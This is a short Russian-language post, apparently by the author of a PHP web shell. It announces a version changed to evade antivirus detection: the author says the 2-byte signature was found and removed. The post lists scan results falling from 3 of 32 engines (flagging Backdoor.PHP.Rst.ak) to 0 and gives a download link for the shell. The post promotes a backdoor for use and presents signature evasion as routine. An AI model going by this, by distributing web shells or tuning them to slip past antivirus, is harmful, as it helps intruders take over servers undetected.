Некоторое время назад Kaspersky и кое какие другие антивирусы, обменивающиеся сигнатурами, начали определять шелл, как нехорошее приложение, в принципе ничего плохого из-за этого не случилось, т.к. мало где эти антивирусы являются серверными, но все равно неприятно, поэтому выкладываю модифицированную версию. Поиск сигнатуры определения скрипта доставил много удовольствий, сигнатура оказалась банальнейшей, это 2 байта по смещению 10 байт с конца файла, поэтому убрать шелл из базы заняло 5 секунд.

Результаты тестирования предыдущей версии:
Результат: 3/32 (9.38%)
F-Secure 6.70.13260.0 2008.05.17 Backdoor.PHP.Rst.ak
GData 2.0.7306.1023 2008.05.17 Backdoor.PHP.Rst.ak
Kaspersky 7.0.0.125 2008.05.17 Backdoor.PHP.Rst.ak

Результаты тестирования текущей версии:
Результат: 0/32 (0%)

Скачать шелл можно по старому адресу
http://madnet.name/files/1/10.html